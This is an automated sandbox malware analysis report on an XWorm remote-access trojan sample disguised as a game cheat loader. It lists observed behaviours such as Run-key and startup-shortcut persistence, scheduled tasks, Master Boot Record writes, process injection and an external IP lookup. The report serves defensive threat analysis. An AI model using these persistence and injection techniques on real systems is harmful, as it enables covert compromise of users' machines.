Malware Analysis Report

2024-11-16 13:35

Sample ID 240527-ak9g5ahc9s
Target $77-Loader.exe
SHA256 ad154938cd996370a456640152ef662faf363af1382bce7c31ece36a1d77a2ec
Tags
xworm bootkit execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ad154938cd996370a456640152ef662faf363af1382bce7c31ece36a1d77a2ec

Threat Level: Known bad

The file $77-Loader.exe was found to be: Known bad.

Malicious Activity Summary

xworm bootkit execution persistence rat trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Executes dropped EXE

Checks computer location settings

Drops startup file

Checks BIOS information in registry

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Looks up external IP address via web service

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies registry class

Checks processor information in registry

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:17

Reported

2024-05-27 00:22

Platform

win10v2004-20240508-en

Max time kernel

300s

Max time network

298s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1800 created 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\$77-Cheat.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Powershell.lnk C:\Users\Admin\$77-Cheat.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Powershell.lnk C:\Users\Admin\$77-Cheat.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-Powershell = "C:\\Users\\Admin\\$77-Powershell.exe" C:\Users\Admin\$77-Cheat.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\$77-Powershell C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1800 set thread context of 4172 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 27 May 2024 00:18:26 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018800EF584BD80" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000074016beb8bc92244934f872812cfa03900000000020000000000106600000001000020000000706c1df2b43fc27edd772e47534fb85ebe35f682187927d0b3eabcc089e12a31000000000e80000000020000200000008fd6bb738871bb9fa5251a82e0ff589e9d5d0260ab61b6d3171bfc9485f33021b003000027bd3bab70497edc4efc7b940e890b91bf4d8b3dad8ee0a36ae01d65f23cfd8f340d78e311605b8eeb03561858c43498fc0461109cc4ea09effbf50f0b368cf92fdee41dc4881f569d283fa27ca591e0eb8f8319bb9543627288a42b3db022cd32f48cc3fe4a00df165a855cf0179b205fc2b02907931c89c9d77fa458ff272ed58b6f5da7ed8d4113e82f9476f74fcb1a5f6abb4e2e5f9634ec8b6dc99c1f00212c927214f08035e2686397d8df30b9bb196d3d8a39b214ac758ef34f9886c9ae37fc55ac3730f95b567b1f91e093ffef5aae6393ff9b90ecf93a86b23d056b64933b7aab62a413427a6ca863ba63336cb59cfcccb87b85f26b19acf39710fc23b4c13fb6cc2bcd4d9027fab0c5d9ddde0eeb67787af88ff0155fde1018199dbd91c24bc52ac21abccd928243b91bfec7250b38e9b6dfdfb82be56c99ce77a711ac1c4418b7d437152a66944c7aa4357fa590fb9b0ada5371ac79f2cd4e1ff6ce99e213cd9fa1e3343607f59d0657a9b581a50a7a89eb6a5b53cd0f69065fa56a3f8023d3007b3c7fa957acf2b562571ccd234bde3c9bc21c8c5fec54bd0ddf42958220ee6cfef77bd77ce63fcca25e515ac96b56998a632a816c8dbaf33cfa73e1df99c5d7c632fee45f46a884a51d0beeaf9240c0e148bdd05afa075107a0098a026bb2b4e49ef3a22b694da44a34a9ed6b69c54bcd8935e241ab95fcd62bacf21edaefc57c884fbf8667573cc05376b3512fc6420d458133576b61635ba614680da95e37f999c6f2f664ff82b86ec178aac7c4c00201156efae44b949ecfac09d76436b05fa9c733ec69e6d66e1a347cca7f43837705410699ea1074fac458d1ba56aaca5257830ef85c9f119d25624475e6503a200e699c43f8833723f775fc213834fca3f67d1f0a969fadb193c277ca105beb70467c8d19c0a82bd169d1eb3dac5b806c88d1225d2ed1e3298782ba479c41d1ee0d095196d15730e15e6fa92727c303ebf4afef1fbf0738a4f58539a63669754f011546d3bd65413dbf49fad25763cf1890deb0d319322426974146d9b2e492c72eaa5e837cec93818d78e363c583ace4c4c21069d40a4913aa13194d28074755d43c750cba581d052ab363a750ab4d23c0f5ea2a9b9aec687924d0aff6c54bec5fa391e9f065681ee23f13053abdbf8a95d232572c778e2c59703dd3a78a4f741dfbd2533bd1106068df3d961e5f0a6d60bfa08cfdf53b24e88699350f78bdd88a415fabef3cd79c1f0ec63c2aae950ca08f0da5ba6cac1ca178235030bb75cf22a05a69889191eb07b54ad5c9720f7c3f26419a8c84b6b4c24000000030b410d6f98b66301131aacfc6b72dbb970b1b82b0ecd3c2b7c7ed266914695c66a61aa9ec22a7c24a0fbeba9c90fcc81660712d726a1a46893a09681ef41697 C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\mousocoreworker.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\42814c0b-6df3-406b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f57b5531-891f-45c4 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d957f485cbafda01eb403e86cbafda01eb403e86cbafda01619206000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bb586b022000366332653934636136653565313632336632366236656430393433663566643364613764356161343437303330303366353164656366386133373734393761620000b20009000400efbebb586b02bb586b022e0000000000000000000000000000000000000000000000000080ec4d00360063003200650039003400630061003600650035006500310036003200330066003200360062003600650064003000390034003300660035006600640033006400610037006400350061006100340034003700300033003000300033006600350031006400650063006600380061003300370037003400390037006100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000344b7c191000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36633265393463613665356531363233663236623665643039343366356664336461376435616134343730333030336635316465636638613337373439376162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464dba4d251ed3d0def11b8c062c35996caed5efd912f2a58f84f87a07e819e0464dba4d251ed3d0def11b8c062c35996caedd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0272d800-5cb4-4c09 = "\\\\?\\Volume{8A2AD7B7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58ef1de56d2dca62a430c4bb683322e09825d22a9d93a4282c21e7ca9807eedc" C:\Windows\System32\RuntimeBroker.exe N/A
